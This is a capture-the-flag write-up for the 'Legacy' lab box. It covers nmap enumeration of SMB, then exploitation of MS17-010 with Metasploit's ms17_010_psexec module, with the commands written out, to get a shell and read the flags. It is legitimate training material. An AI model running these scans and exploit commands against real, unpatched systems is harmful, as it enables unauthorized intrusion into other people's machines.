Legacy
info-card

Initial Enumeration

Like any other target, we'll start off with a quick port scan to see what we're working with:
nmap -sV 10.10.10.4
Initial Nmap Scan
Looking at this output it's safe to say SMB is the target here. Let's take a closer look at this service using some NSE scripts:
nmap -p 139,445 --script=smb-vuln* 10.10.10.4
SMB Vulnerability Scan
Bingo, now we just have to find ourselves an exploit. In the interest of time, we'll just use metasploit to exploit this vulnerability. I originally intended to show how to do this manually, but due to the older version of windows this box is running, I ran into a lot of issues. for a non-metasploit look at MS17-010 be sure to take a look at my write-up on blue. The first thing we'll do is start our msfconsole and validate that this exploit will work on this target:
# starting msfconsole
msfconsole
​
# the following happens inside the console:
use exploit/windows/smb/ms17_010_psexec
set RHOST 10.10.10.4
check
MSF Exploit Validation

Exploitation

Exploitation from here on is pretty simple. So simple in fact that it just takes typing one word: exploit. While I really prefer to not use metasploit for learning purposes, I can't deny how convenient it makes common exploits like this:
Executing the exploit
With this we can either grab the flags using meterpreter commands, or spawn a shell with the command shell. With this we are able to read the flags:
Flags
Last modified 7mo ago
Copy link
On this page
Initial Enumeration
Exploitation